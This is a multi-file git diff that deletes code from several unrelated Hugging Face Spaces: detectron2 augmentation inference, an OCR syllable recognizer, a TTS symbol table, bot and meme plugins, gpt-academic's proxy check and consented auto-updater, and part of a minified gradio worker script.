- - Inputs & outputs have the same format as :meth:`GeneralizedRCNN.inference` - """ - if detected_instances is None: - detected_instances = [None] * len(batched_inputs) - - outputs = [] - inputs, instances = [], [] - for idx, input, instance in zip(count(), batched_inputs, detected_instances): - inputs.append(input) - instances.append(instance) - if len(inputs) == self.batch_size or idx == len(batched_inputs) - 1: - outputs.extend( - self.model.inference( - inputs, - instances if instances[0] is not None else None, - do_postprocess=False, - ) - ) - inputs, instances = [], [] - return outputs - - def __call__(self, batched_inputs): - """ - Same input/output format as :meth:`GeneralizedRCNN.forward` - """ - - def _maybe_read_image(dataset_dict): - ret = copy.copy(dataset_dict) - if "image" not in ret: - image = read_image(ret.pop("file_name"), self.model.input_format) - image = torch.from_numpy(np.ascontiguousarray(image.transpose(2, 0, 1))) # CHW - ret["image"] = image - if "height" not in ret and "width" not in ret: - ret["height"] = image.shape[1] - ret["width"] = image.shape[2] - return ret - - return [self._inference_one_image(_maybe_read_image(x)) for x in batched_inputs] - - def _inference_one_image(self, input): - """ - Args: - input (dict): one dataset dict with "image" field being a CHW tensor - - Returns: - dict: one output dict - """ - orig_shape = (input["height"], input["width"]) - augmented_inputs, tfms = self._get_augmented_inputs(input) - # Detect boxes from all augmented versions - with self._turn_off_roi_heads(["mask_on", "keypoint_on"]): - # temporarily disable roi heads - all_boxes, all_scores, all_classes = self._get_augmented_boxes(augmented_inputs, tfms) - # merge all detected boxes to obtain final predictions for boxes - merged_instances = self._merge_detections(all_boxes, all_scores, all_classes, orig_shape) - - if self.cfg.MODEL.MASK_ON: - # Use the detected boxes to obtain masks - augmented_instances = self._rescale_detected_boxes( - augmented_inputs, merged_instances, tfms - ) - # run forward on the detected boxes - outputs = self._batch_inference(augmented_inputs, augmented_instances) - # Delete now useless variables to avoid being out of memory - del augmented_inputs, augmented_instances - # average the predictions - merged_instances.pred_masks = self._reduce_pred_masks(outputs, tfms) - merged_instances = detector_postprocess(merged_instances, *orig_shape) - return {"instances": merged_instances} - else: - return {"instances": merged_instances} - - def _get_augmented_inputs(self, input): - augmented_inputs = self.tta_mapper(input) - tfms = [x.pop("transforms") for x in augmented_inputs] - return augmented_inputs, tfms - - def _get_augmented_boxes(self, augmented_inputs, tfms): - # 1: forward with all augmented images - outputs = self._batch_inference(augmented_inputs) - # 2: union the results - all_boxes = [] - all_scores = [] - all_classes = [] - for output, tfm in zip(outputs, tfms): - # Need to inverse the transforms on boxes, to obtain results on original image - pred_boxes = output.pred_boxes.tensor - original_pred_boxes = tfm.inverse().apply_box(pred_boxes.cpu().numpy()) - all_boxes.append(torch.from_numpy(original_pred_boxes).to(pred_boxes.device)) - - all_scores.extend(output.scores) - all_classes.extend(output.pred_classes) - all_boxes = torch.cat(all_boxes, dim=0) - return all_boxes, all_scores, all_classes - - def _merge_detections(self, all_boxes, all_scores, all_classes, shape_hw): - # select from the union of all results - num_boxes = 
len(all_boxes) - num_classes = self.cfg.MODEL.ROI_HEADS.NUM_CLASSES - # +1 because fast_rcnn_inference expects background scores as well - all_scores_2d = torch.zeros(num_boxes, num_classes + 1, device=all_boxes.device) - for idx, cls, score in zip(count(), all_classes, all_scores): - all_scores_2d[idx, cls] = score - - merged_instances, _ = fast_rcnn_inference_single_image( - all_boxes, - all_scores_2d, - shape_hw, - 1e-8, - self.cfg.MODEL.ROI_HEADS.NMS_THRESH_TEST, - self.cfg.TEST.DETECTIONS_PER_IMAGE, - ) - - return merged_instances - - def _rescale_detected_boxes(self, augmented_inputs, merged_instances, tfms): - augmented_instances = [] - for input, tfm in zip(augmented_inputs, tfms): - # Transform the target box to the augmented image's coordinate space - pred_boxes = merged_instances.pred_boxes.tensor.cpu().numpy() - pred_boxes = torch.from_numpy(tfm.apply_box(pred_boxes)) - - aug_instances = Instances( - image_size=input["image"].shape[1:3], - pred_boxes=Boxes(pred_boxes), - pred_classes=merged_instances.pred_classes, - scores=merged_instances.scores, - ) - augmented_instances.append(aug_instances) - return augmented_instances - - def _reduce_pred_masks(self, outputs, tfms): - # Should apply inverse transforms on masks. - # We assume only resize & flip are used. pred_masks is a scale-invariant - # representation, so we handle flip specially - for output, tfm in zip(outputs, tfms): - if any(isinstance(t, HFlipTransform) for t in tfm.transforms): - output.pred_masks = output.pred_masks.flip(dims=[3]) - all_pred_masks = torch.stack([o.pred_masks for o in outputs], dim=0) - avg_pred_masks = torch.mean(all_pred_masks, dim=0) - return avg_pred_masks diff --git a/spaces/CaliforniaHealthCollaborative/Emoji2KaktovicEncryptKey/EMOJILOGIC.md b/spaces/CaliforniaHealthCollaborative/Emoji2KaktovicEncryptKey/EMOJILOGIC.md deleted file mode 100644 index 20a4085aa4cc98bef7c06f2b088b750fb3f1e7ce..0000000000000000000000000000000000000000 --- a/spaces/CaliforniaHealthCollaborative/Emoji2KaktovicEncryptKey/EMOJILOGIC.md +++ /dev/null @@ -1,11 +0,0 @@ ---- -title: README -emoji: 🏢 -colorFrom: indigo -colorTo: blue -sdk: static -pinned: true -license: mit ---- - 
-[![](https://mermaid.ink/img/pako:eNqVl81u00AUhV9lNIhdWtkz_kdiQWpVVYJUNVlBkDXY03SIY0e20za0XbBhwQokFuwq8RA8F4_A_KTNxFIk7qo55565dzxfGo3vcF4XHCd43rDVFZq-mVUIpe9nOF3Wn8QpW3I0LFnbzvAHXUFHR6_vZzjLRCW6LJvhe3Q2kvEzKQUrxWeOeJU3m1Un6ipb8A1iVYHmsk9W1vNel7ZjTZepouozOZV9JspCp9ray8rV2arhhchVZ5Ufn8v8uJ6jc8veW1OIdlWyjZ6QNbxdl12rVp5cyJUnpqhnoYun4t76vK6uudwhV2eRdXW2YIuuvhaLTD6Ueribuil0x6E6g6GJI310qKvRaBvXZzB6ju_N6Boxn_Mmy1lZqiMSueo3Hct-U1NCQ1lCY1PSa9v1R4NLT1KO7OfKFX8ff33bZqRDjPNl51DjfN05nnEed45vnJ87JzDO750TGufHzomM833nxMb5s3V4Vag_w5F6brlbWxBbUFt4tvBtEdgitEVki1iJ6dga-iSILagtPFv4tghsEdoisoUemrpbwrHzUiE1A1PSc_XklPZcvYXU67l6L6nfc_Wm0qDn6t2lYc_V20yjnmv2G2_dC_ltrZe64B4qkEMFeqjgHSr4hwrBoUJ4qKCfrhTVYtJtSo4c1HZNveDJC8LzInQHRh7diKK7Ssjq9tV-3gXmCTBPgXkPmPeB-QCYD4H5CJiPobzAgKGEXShiF8rYhUJ2oZRdKGYXytmFgnahpAmUNAH_L0NJEyhpAiVNoKQJlDSBkiZQ0gRKmkJJUyhpCv7ZhpKmUNIUSppCSVMoaQolTf-HNB7gJW-WTBTyjeNONZAX4CuuLvuJ_FjwSyav4TM8qx5klK27erKpcpx0zZoP8HpVsI6fCCYvv8t9My1EVzc4uWRlK80Vq97V9XNGSpzc4VucxPSYel7kByQgxAkdOsAbnHj-se86NPB8SrzQCR8G-LNe7hzHTuz6jk8iQjw_iAaY60lvzUuTfnd6-AdpI06c?type=png)](https://mermaid.live/edit#pako:eNqVl81u00AUhV9lNIhdWtkz_kdiQWpVVYJUNVlBkDXY03SIY0e20za0XbBhwQokFuwq8RA8F4_A_KTNxFIk7qo55565dzxfGo3vcF4XHCd43rDVFZq-mVUIpe9nOF3Wn8QpW3I0LFnbzvAHXUFHR6_vZzjLRCW6LJvhe3Q2kvEzKQUrxWeOeJU3m1Un6ipb8A1iVYHmsk9W1vNel7ZjTZepouozOZV9JspCp9ray8rV2arhhchVZ5Ufn8v8uJ6jc8veW1OIdlWyjZ6QNbxdl12rVp5cyJUnpqhnoYun4t76vK6uudwhV2eRdXW2YIuuvhaLTD6Ueribuil0x6E6g6GJI310qKvRaBvXZzB6ju_N6Boxn_Mmy1lZqiMSueo3Hct-U1NCQ1lCY1PSa9v1R4NLT1KO7OfKFX8ff33bZqRDjPNl51DjfN05nnEed45vnJ87JzDO750TGufHzomM833nxMb5s3V4Vag_w5F6brlbWxBbUFt4tvBtEdgitEVki1iJ6dga-iSILagtPFv4tghsEdoisoUemrpbwrHzUiE1A1PSc_XklPZcvYXU67l6L6nfc_Wm0qDn6t2lYc_V20yjnmv2G2_dC_ltrZe64B4qkEMFeqjgHSr4hwrBoUJ4qKCfrhTVYtJtSo4c1HZNveDJC8LzInQHRh7diKK7Ssjq9tV-3gXmCTBPgXkPmPeB-QCYD4H5CJiPobzAgKGEXShiF8rYhUJ2oZRdKGYXytmFgnahpAmUNAH_L0NJEyhpAiVNoKQJlDSBkiZQ0gRKmkJJUyhpCv7ZhpKmUNIUSppCSVMoaQolTf-HNB7gJW-WTBTyjeNONZAX4CuuLvuJ_FjwSyav4TM8qx5klK27erKpcpx0zZoP8HpVsI6fCCYvv8t9My1EVzc4uWRlK80Vq97V9XNGSpzc4VucxPSYel7kByQgxAkdOsAbnHj-se86NPB8SrzQCR8G-LNe7hzHTuz6jk8iQjw_iAaY60lvzUuTfnd6-AdpI06c) \ No newline at end of file diff --git a/spaces/Chomkwoy/Nilkessye/syllable_model.py b/spaces/Chomkwoy/Nilkessye/syllable_model.py deleted file mode 100644 index a3bc6ac43adbc30432eacc526654214059433b43..0000000000000000000000000000000000000000 --- a/spaces/Chomkwoy/Nilkessye/syllable_model.py +++ /dev/null @@ -1,55 +0,0 @@ -import torch -from torch.nn import CrossEntropyLoss - -from transformers import VisionEncoderDecoderModel -from transformers import TrOCRProcessor, RobertaTokenizerFast - - -class SyllableRecognizer: - def __init__(self, model=None): - if model is None: - self.model: VisionEncoderDecoderModel = VisionEncoderDecoderModel.from_pretrained( - "ckpt-syllable-3fonts-surrounded-real" - ) - else: - self.model: VisionEncoderDecoderModel = model - - self.processor = TrOCRProcessor.from_pretrained("Chomkwoy/nilkessye_tokenizer") - - def _preprocess_images(self, images): - pixel_values = [] - for image in images: - pixel_values.append(self.processor(image, return_tensors="pt").pixel_values) - pixel_values = torch.cat(pixel_values, dim=0) - return pixel_values - - def recognize(self, images): - pixel_values = self._preprocess_images(images) - - generated_ids = self.model.generate( - pixel_values.to(self.model.device), - max_new_tokens=13, - early_stopping=True, - eos_token_id=self.processor.tokenizer.eos_token_id - ) - generated_text = self.processor.batch_decode(generated_ids, skip_special_tokens=True) - 
return generated_text - - def loss(self, images, text): - pixel_values = self._preprocess_images(images) - tokens = self.processor.tokenizer(text, padding=True, return_tensors='pt') - labels = tokens['input_ids'] - labels[labels == self.processor.tokenizer.pad_token_id] = -100 - - with torch.no_grad(): - outputs = self.model( - pixel_values=pixel_values.to(self.model.device), - labels=labels.to(self.model.device), - return_dict=True, - ) - - logits = outputs.logits.cpu() - loss_fct = CrossEntropyLoss(reduction='none') - loss = loss_fct(logits.permute(0, 2, 1), labels) - - return loss.sum(-1) diff --git a/spaces/Cicooo/vits-uma-genshin-honkai/text/symbols.py b/spaces/Cicooo/vits-uma-genshin-honkai/text/symbols.py deleted file mode 100644 index edfbd24247be8c757275ce80b9ec27a0ffa808f3..0000000000000000000000000000000000000000 --- a/spaces/Cicooo/vits-uma-genshin-honkai/text/symbols.py +++ /dev/null @@ -1,39 +0,0 @@ -''' -Defines the set of symbols used in text input to the model. -''' - -'''# japanese_cleaners -_pad = '_' -_punctuation = ',.!?-' -_letters = 'AEINOQUabdefghijkmnoprstuvwyzʃʧ↓↑ ' -''' - -'''# japanese_cleaners2 -_pad = '_' -_punctuation = ',.!?-~…' -_letters = 'AEINOQUabdefghijkmnoprstuvwyzʃʧʦ↓↑ ' -''' - -'''# korean_cleaners -_pad = '_' -_punctuation = ',.!?…~' -_letters = 'ㄱㄴㄷㄹㅁㅂㅅㅇㅈㅊㅋㅌㅍㅎㄲㄸㅃㅆㅉㅏㅓㅗㅜㅡㅣㅐㅔ ' -''' - -'''# chinese_cleaners -_pad = '_' -_punctuation = ',。!?—…' -_letters = 'ㄅㄆㄇㄈㄉㄊㄋㄌㄍㄎㄏㄐㄑㄒㄓㄔㄕㄖㄗㄘㄙㄚㄛㄜㄝㄞㄟㄠㄡㄢㄣㄤㄥㄦㄧㄨㄩˉˊˇˋ˙ ' -''' - -# zh_ja_mixture_cleaners -_pad = '_' -_punctuation = ',.!?-~…' -_letters = 'AEINOQUabdefghijklmnoprstuvwyzʃʧʦɯɹəɥ⁼ʰ`→↓↑ ' - - -# Export all symbols: -symbols = [_pad] + list(_punctuation) + list(_letters) - -# Special symbol ids -SPACE_ID = symbols.index(" ") \ No newline at end of file diff --git a/spaces/CikeyQI/Yunzai/Yunzai/plugins/other/version.js b/spaces/CikeyQI/Yunzai/Yunzai/plugins/other/version.js deleted file mode 100644 index f77786549d97f6c47b41612ae675b9198de3872b..0000000000000000000000000000000000000000 --- a/spaces/CikeyQI/Yunzai/Yunzai/plugins/other/version.js +++ /dev/null @@ -1,27 +0,0 @@ -import { App, Common, Version } from '#miao' - -let app = App.init({ - id: 'version', - name: '版本', - desc: '版本' -}) - -app.reg({ - version: { - rule: /^#版本$/, - desc: '【#帮助】 版本介绍', - fn: async function (e) { - let { changelogs, currentVersion } = Version.readLogFile('root') - return await Common.render('help/version-info', { - currentVersion, - changelogs, - name: 'TRSS-Yunzai', - elem: 'cryo', - pluginName: false, - pluginVersion: false - }, { e, scale: 1.2 }) - } - } -}) - -export const version = app.v3App() diff --git a/spaces/CikeyQI/meme-api/meme_generator/memes/cover_face/__init__.py b/spaces/CikeyQI/meme-api/meme_generator/memes/cover_face/__init__.py deleted file mode 100644 index b28aa8e58319f5b20dd3594a7678137f240bf851..0000000000000000000000000000000000000000 --- a/spaces/CikeyQI/meme-api/meme_generator/memes/cover_face/__init__.py +++ /dev/null @@ -1,19 +0,0 @@ -from pathlib import Path -from typing import List - -from pil_utils import BuildImage - -from meme_generator import add_meme - -img_dir = Path(__file__).parent / "images" - - -def cover_face(images: List[BuildImage], texts, args): - points = ((15, 15), (448, 0), (445, 456), (0, 465)) - img = images[0].convert("RGBA").square().resize((450, 450)).perspective(points) - frame = BuildImage.open(img_dir / "0.png") - frame.paste(img, (120, 150), below=True) - return frame.save_jpg() - - -add_meme("cover_face", cover_face, min_images=1, max_images=1, keywords=["捂脸"]) diff --git 
a/spaces/Cong723/gpt-academic-public/check_proxy.py b/spaces/Cong723/gpt-academic-public/check_proxy.py deleted file mode 100644 index 754b5d36b0c39d29eb6f4dcb8ed88355bcb6335f..0000000000000000000000000000000000000000 --- a/spaces/Cong723/gpt-academic-public/check_proxy.py +++ /dev/null @@ -1,151 +0,0 @@ - -def check_proxy(proxies): - import requests - proxies_https = proxies['https'] if proxies is not None else '无' - try: - response = requests.get("https://ipapi.co/json/", - proxies=proxies, timeout=4) - data = response.json() - print(f'查询代理的地理位置,返回的结果是{data}') - if 'country_name' in data: - country = data['country_name'] - result = f"代理配置 {proxies_https}, 代理所在地:{country}" - elif 'error' in data: - result = f"代理配置 {proxies_https}, 代理所在地:未知,IP查询频率受限" - print(result) - return result - except: - result = f"代理配置 {proxies_https}, 代理所在地查询超时,代理可能无效" - print(result) - return result - - -def backup_and_download(current_version, remote_version): - """ - 一键更新协议:备份和下载 - """ - from toolbox import get_conf - import shutil - import os - import requests - import zipfile - os.makedirs(f'./history', exist_ok=True) - backup_dir = f'./history/backup-{current_version}/' - new_version_dir = f'./history/new-version-{remote_version}/' - if os.path.exists(new_version_dir): - return new_version_dir - os.makedirs(new_version_dir) - shutil.copytree('./', backup_dir, ignore=lambda x, y: ['history']) - proxies, = get_conf('proxies') - r = requests.get( - 'https://github.com/binary-husky/chatgpt_academic/archive/refs/heads/master.zip', proxies=proxies, stream=True) - zip_file_path = backup_dir+'/master.zip' - with open(zip_file_path, 'wb+') as f: - f.write(r.content) - dst_path = new_version_dir - with zipfile.ZipFile(zip_file_path, "r") as zip_ref: - for zip_info in zip_ref.infolist(): - dst_file_path = os.path.join(dst_path, zip_info.filename) - if os.path.exists(dst_file_path): - os.remove(dst_file_path) - zip_ref.extract(zip_info, dst_path) - return new_version_dir - - -def patch_and_restart(path): - """ - 一键更新协议:覆盖和重启 - """ - from distutils import dir_util - import shutil - import os - import sys - import time - import glob - from colorful import print亮黄, print亮绿, print亮红 - # if not using config_private, move origin config.py as config_private.py - if not os.path.exists('config_private.py'): - print亮黄('由于您没有设置config_private.py私密配置,现将您的现有配置移动至config_private.py以防止配置丢失,', - '另外您可以随时在history子文件夹下找回旧版的程序。') - shutil.copyfile('config.py', 'config_private.py') - path_new_version = glob.glob(path + '/*-master')[0] - dir_util.copy_tree(path_new_version, './') - print亮绿('代码已经更新,即将更新pip包依赖……') - for i in reversed(range(5)): time.sleep(1); print(i) - try: - import subprocess - subprocess.check_call([sys.executable, '-m', 'pip', 'install', '-r', 'requirements.txt']) - except: - print亮红('pip包依赖安装出现问题,需要手动安装新增的依赖库 `python -m pip install -r requirements.txt`,然后在用常规的`python main.py`的方式启动。') - print亮绿('更新完成,您可以随时在history子文件夹下找回旧版的程序,5s之后重启') - print亮红('假如重启失败,您可能需要手动安装新增的依赖库 `python -m pip install -r requirements.txt`,然后在用常规的`python main.py`的方式启动。') - print(' ------------------------------ -----------------------------------') - for i in reversed(range(8)): time.sleep(1); print(i) - os.execl(sys.executable, sys.executable, *sys.argv) - - -def get_current_version(): - import json - try: - with open('./version', 'r', encoding='utf8') as f: - current_version = json.loads(f.read())['version'] - except: - current_version = "" - return current_version - - -def auto_update(): - """ - 一键更新协议:查询版本和用户意见 - """ - try: - from toolbox import 
get_conf - import requests - import time - import json - proxies, = get_conf('proxies') - response = requests.get( - "https://raw.githubusercontent.com/binary-husky/chatgpt_academic/master/version", proxies=proxies, timeout=5) - remote_json_data = json.loads(response.text) - remote_version = remote_json_data['version'] - if remote_json_data["show_feature"]: - new_feature = "新功能:" + remote_json_data["new_feature"] - else: - new_feature = "" - with open('./version', 'r', encoding='utf8') as f: - current_version = f.read() - current_version = json.loads(current_version)['version'] - if (remote_version - current_version) >= 0.01: - from colorful import print亮黄 - print亮黄( - f'\n新版本可用。新版本:{remote_version},当前版本:{current_version}。{new_feature}') - print('(1)Github更新地址:\nhttps://github.com/binary-husky/chatgpt_academic\n') - user_instruction = input('(2)是否一键更新代码(Y+回车=确认,输入其他/无输入+回车=不更新)?') - if user_instruction in ['Y', 'y']: - path = backup_and_download(current_version, remote_version) - try: - patch_and_restart(path) - except: - print('更新失败。') - else: - print('自动更新程序:已禁用') - return - else: - return - except: - print('自动更新程序:已禁用') - -def warm_up_modules(): - print('正在执行一些模块的预热...') - from request_llm.bridge_all import model_info - enc = model_info["gpt-3.5-turbo"]['tokenizer'] - enc.encode("模块预热", disallowed_special=()) - enc = model_info["gpt-4"]['tokenizer'] - enc.encode("模块预热", disallowed_special=()) - -if __name__ == '__main__': - import os - os.environ['no_proxy'] = '*' # 避免代理网络产生意外污染 - from toolbox import get_conf - proxies, = get_conf('proxies') - check_proxy(proxies) diff --git a/spaces/DQChoi/gpt-demo/venv/lib/python3.11/site-packages/gradio/templates/frontend/assets/module-447425fe.js b/spaces/DQChoi/gpt-demo/venv/lib/python3.11/site-packages/gradio/templates/frontend/assets/module-447425fe.js deleted file mode 100644 index b2a4d8a9afe817495020c2e5efcdd32ee9b4f0cf..0000000000000000000000000000000000000000 --- a/spaces/DQChoi/gpt-demo/venv/lib/python3.11/site-packages/gradio/templates/frontend/assets/module-447425fe.js +++ /dev/null @@ -1,9 +0,0 @@ -import{c as ar,a as ir,g as cr}from"./module-a3cf0cc4.js";import{g as nn}from"./index-3370be2a.js";const xt=new Set,ur=ar({encode:({call:e})=>async(t,n)=>{const r=await e("encode",{encoderId:t,timeslice:n});return xt.delete(t),r},instantiate:({call:e})=>async(t,n)=>{const r=ir(xt),o=await e("instantiate",{encoderId:r,mimeType:t,sampleRate:n});return{encoderId:r,port:o}},register:({call:e})=>t=>e("register",{port:t},[t])}),lr=e=>{const t=new Worker(e);return ur(t)},dr=`(()=>{var e={775:function(e,t,r){!function(e,t,r,n){"use strict";function o(e){return e&&"object"==typeof e&&"default"in e?e:{default:e}}var a=o(t),s=o(r),i=o(n),c=function(e,t){return void 0===t?e:t.reduce((function(e,t){if("capitalize"===t){var r=e.charAt(0).toUpperCase(),n=e.slice(1);return"".concat(r).concat(n)}return"dashify"===t?s.default(e):"prependIndefiniteArticle"===t?"".concat(i.default(e)," ").concat(e):e}),e)},u=function(e){var t=e.name+e.modifiers.map((function(e){return"\\\\.".concat(e,"\\\\(\\\\)")})).join("");return new RegExp("\\\\$\\\\{".concat(t,"}"),"g")},l=function(e,t){for(var r=/\\\${([^.}]+)((\\.[^(]+\\(\\))*)}/g,n=[],o=r.exec(e);null!==o;){var s={modifiers:[],name:o[1]};if(void 0!==o[3])for(var i=/\\.[^(]+\\(\\)/g,l=i.exec(o[2]);null!==l;)s.modifiers.push(l[0].slice(1,-2)),l=i.exec(o[2]);n.push(s),o=r.exec(e)}var d=n.reduce((function(e,r){return e.map((function(e){return"string"==typeof e?e.split(u(r)).reduce((function(e,n,o){return 0===o?[n]:r.name in 
t?[].concat(a.default(e),[c(t[r.name],r.modifiers),n]):[].concat(a.default(e),[function(e){return c(e[r.name],r.modifiers)},n])}),[]):[e]})).reduce((function(e,t){return[].concat(a.default(e),a.default(t))}),[])}),[e]);return function(e){return d.reduce((function(t,r){return[].concat(a.default(t),"string"==typeof r?[r]:[r(e)])}),[]).join("")}},d=function(e){var t=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{},r=void 0===e.code?void 0:l(e.code,t),n=void 0===e.message?void 0:l(e.message,t);function o(){var t=arguments.length>0&&void 0!==arguments[0]?arguments[0]:{},o=arguments.length>1?arguments[1]:void 0,a=void 0===o&&(t instanceof Error||void 0!==t.code&&"Exception"===t.code.slice(-9))?{cause:t,missingParameters:{}}:{cause:o,missingParameters:t},s=a.cause,i=a.missingParameters,c=void 0===n?new Error:new Error(n(i));return null!==s&&(c.cause=s),void 0!==r&&(c.code=r(i)),void 0!==e.status&&(c.status=e.status),c}return o};e.compile=d,Object.defineProperty(e,"__esModule",{value:!0})}(t,r(106),r(881),r(507))},881:e=>{"use strict";e.exports=(e,t)=>{if("string"!=typeof e)throw new TypeError("expected a string");return e.trim().replace(/([a-z])([A-Z])/g,"$1-$2").replace(/\\W/g,(e=>/[À-ž]/.test(e)?e:"-")).replace(/^-+|-+$/g,"").replace(/-{2,}/g,(e=>t&&t.condense?"-":e)).toLowerCase()}},107:function(e,t){!function(e){"use strict";var t=function(e){return function(t){var r=e(t);return t.add(r),r}},r=function(e){return function(t,r){return e.set(t,r),r}},n=void 0===Number.MAX_SAFE_INTEGER?9007199254740991:Number.MAX_SAFE_INTEGER,o=536870912,a=2*o,s=function(e,t){return function(r){var s=t.get(r),i=void 0===s?r.size:sn)throw new Error("Congratulations, you created a collection of unique numbers which uses all available integers!");for(;r.has(i);)i=Math.floor(Math.random()*n);return e(r,i)}},i=new WeakMap,c=r(i),u=s(c,i),l=t(u);e.addUniqueNumber=l,e.generateUniqueNumber=u,Object.defineProperty(e,"__esModule",{value:!0})}(t)},507:e=>{var t=function(e){var t,r,n=/\\w+/.exec(e);if(!n)return"an";var o=(r=n[0]).toLowerCase(),a=["honest","hour","hono"];for(t in a)if(0==o.indexOf(a[t]))return"an";if(1==o.length)return"aedhilmnorsx".indexOf(o)>=0?"an":"a";if(r.match(/(?!FJO|[HLMNS]Y.|RY[EO]|SQU|(F[LR]?|[HL]|MN?|N|RH?|S[CHKLMNPTVW]?|X(YL)?)[AEIOU])[FHLMNRSX][A-Z]/))return"an";var s=[/^e[uw]/,/^onc?e\\b/,/^uni([^nmd]|mo)/,/^u[bcfhjkqrst][aeiou]/];for(t=0;t=0?"an":"a":"aeiou".indexOf(o[0])>=0||o.match(/^y(b[lor]|cl[ea]|fere|gg|p[ios]|rou|tt)/)?"an":"a"};void 0!==e.exports?e.exports=t:window.indefiniteArticle=t},768:e=>{e.exports=function(e,t){(null==t||t>e.length)&&(t=e.length);for(var r=0,n=new Array(t);r{var n=r(768);e.exports=function(e){if(Array.isArray(e))return n(e)},e.exports.__esModule=!0,e.exports.default=e.exports},642:e=>{e.exports=function(e){if("undefined"!=typeof Symbol&&null!=e[Symbol.iterator]||null!=e["@@iterator"])return Array.from(e)},e.exports.__esModule=!0,e.exports.default=e.exports},344:e=>{e.exports=function(){throw new TypeError("Invalid attempt to spread non-iterable instance.\\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")},e.exports.__esModule=!0,e.exports.default=e.exports},106:(e,t,r)=>{var n=r(907),o=r(642),a=r(906),s=r(344);e.exports=function(e){return n(e)||o(e)||a(e)||s()},e.exports.__esModule=!0,e.exports.default=e.exports},906:(e,t,r)=>{var n=r(768);e.exports=function(e,t){if(e){if("string"==typeof e)return n(e,t);var 
r=Object.prototype.toString.call(e).slice(8,-1);return"Object"===r&&e.constructor&&(r=e.constructor.name),"Map"===r||"Set"===r?Array.from(e):"Arguments"===r||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(r)?n(e,t):void 0}},e.exports.__esModule=!0,e.exports.default=e.exports}},t={};function r(n){var o=t[n];if(void 0!==o)return o.exports;var a=t[n]={exports:{}};return e[n].call(a.exports,a,a.exports,r),a.exports}(()=>{"use strict";var e=r(775);const t=-32603,n=-32602,o=-32601,a=(0,e.compile)({message:'The requested method called "\${method}" is not supported.',status:o}),s=(0,e.compile)({message:'The handler of the method called "\${method}" returned no required result.',status:t}),i=(0,e.compile)({message:'The handler of the method called "\${method}" returned an unexpected result.',status:t}),c=(0,e.compile)({message:'The specified parameter called "portId" with the given value "\${portId}" does not identify a port connected to this worker.',status:n}),u=(e,t)=>async r=>{let{data:{id:n,method:o,params:c}}=r;const u=t[o];try{if(void 0===u)throw a({method:o});const t=void 0===c?u():u(c);if(void 0===t)throw s({method:o});const r=t instanceof Promise?await t:t;if(null===n){if(void 0!==r.result)throw i({method:o})}else{if(void 0===r.result)throw i({method:o});const{result:t,transferables:a=[]}=r;e.postMessage({id:n,result:t},a)}}catch(t){const{message:r,status:o=-32603}=t;e.postMessage({error:{code:o,message:r},id:n})}};var l=r(107);const d=new Map,f=(e,t,r)=>({...t,connect:r=>{let{port:n}=r;n.start();const o=e(n,t),a=(0,l.generateUniqueNumber)(d);return d.set(a,(()=>{o(),n.close(),d.delete(a)})),{result:a}},disconnect:e=>{let{portId:t}=e;const r=d.get(t);if(void 0===r)throw c({portId:t.toString()});return r(),{result:null}},isSupported:async()=>{if(await new Promise((e=>{const t=new ArrayBuffer(0),{port1:r,port2:n}=new MessageChannel;r.onmessage=t=>{let{data:r}=t;return e(null!==r)},n.postMessage(t,[t])}))){const e=r();return{result:e instanceof Promise?await e:e}}return{result:!1}}}),p=function(e,t){let r=arguments.length>2&&void 0!==arguments[2]?arguments[2]:()=>!0;const n=f(p,t,r),o=u(e,n);return e.addEventListener("message",o),()=>e.removeEventListener("message",o)},m=e=>{e.onmessage=null,e.close()},h=new WeakMap,g=new WeakMap,v=(e=>{const t=(r=e,{...r,connect:e=>{let{call:t}=e;return async()=>{const{port1:e,port2:r}=new MessageChannel,n=await t("connect",{port:e},[e]);return h.set(r,n),r}},disconnect:e=>{let{call:t}=e;return async e=>{const r=h.get(e);if(void 0===r)throw new Error("The given port is not connected.");await t("disconnect",{portId:r})}},isSupported:e=>{let{call:t}=e;return()=>t("isSupported")}});var r;return e=>{const r=(e=>{if(g.has(e))return g.get(e);const t=new Map;return g.set(e,t),t})(e);e.addEventListener("message",(e=>{let{data:t}=e;const{id:n}=t;if(null!==n&&r.has(n)){const{reject:e,resolve:o}=r.get(n);r.delete(n),void 0===t.error?o(t.result):e(new Error(t.error.message))}})),(e=>"function"==typeof e.start)(e)&&e.start();const n=function(t){let n=arguments.length>1&&void 0!==arguments[1]?arguments[1]:null,o=arguments.length>2&&void 0!==arguments[2]?arguments[2]:[];return new Promise(((a,s)=>{const i=(0,l.generateUniqueNumber)(r);r.set(i,{reject:s,resolve:a}),null===n?e.postMessage({id:i,method:t},o):e.postMessage({id:i,method:t,params:n},o)}))},o=function(t,r){let n=arguments.length>2&&void 0!==arguments[2]?arguments[2]:[];e.postMessage({id:null,method:t,params:r},n)};let a={};for(const[e,r]of 
Object.entries(t))a={...a,[e]:r({call:n,notify:o})};return{...a}}})({characterize:e=>{let{call:t}=e;return()=>t("characterize")},encode:e=>{let{call:t}=e;return(e,r)=>t("encode",{recordingId:e,timeslice:r})},record:e=>{let{call:t}=e;return async(e,r,n)=>{await t("record",{recordingId:e,sampleRate:r,typedArrays:n},n.map((e=>{let{buffer:t}=e;return t})))}}}),w=async(e,t)=>{const r=v(t),n=await r.characterize(),o=n.toString();if(e.has(o))throw new Error("There is already an encoder stored which handles exactly the same mime types.");return e.set(o,[n,r]),n},x=new Map,y=(e=>t=>{const r=e.get(t);if(void 0===r)throw new Error("There was no instance of an encoder stored with the given id.");return r})(x),M=((e,t)=>r=>{const n=t(r);return e.delete(r),n})(x,y),b=new Map,E=((e,t)=>r=>{const[n,o,a,s]=t(r);return a?new Promise((t=>{o.onmessage=a=>{let{data:i}=a;0===i.length?(e(o),t(n.encode(r,null))):n.record(r,s,i)}})):n.encode(r,null)})(m,M),A=(e=>t=>{for(const[r,n]of Array.from(e.values()))if(r.test(t))return n;throw new Error("There is no encoder registered which could handle the given mimeType.")})(b),_=((e,t,r)=>(n,o,a)=>{if(t.has(n))throw new Error('There is already an encoder registered with an id called "'.concat(n,'".'));const s=r(o),{port1:i,port2:c}=new MessageChannel,u=[s,i,!0,a];return t.set(n,u),i.onmessage=t=>{let{data:r}=t;0===r.length?(e(i),u[2]=!1):s.record(n,a,r)},c})(m,x,A),I=(e=>(t,r)=>{const[n]=e(t);return n.encode(t,r)})(y);p(self,{encode:async e=>{let{encoderId:t,timeslice:r}=e;const n=null===r?await E(t):await 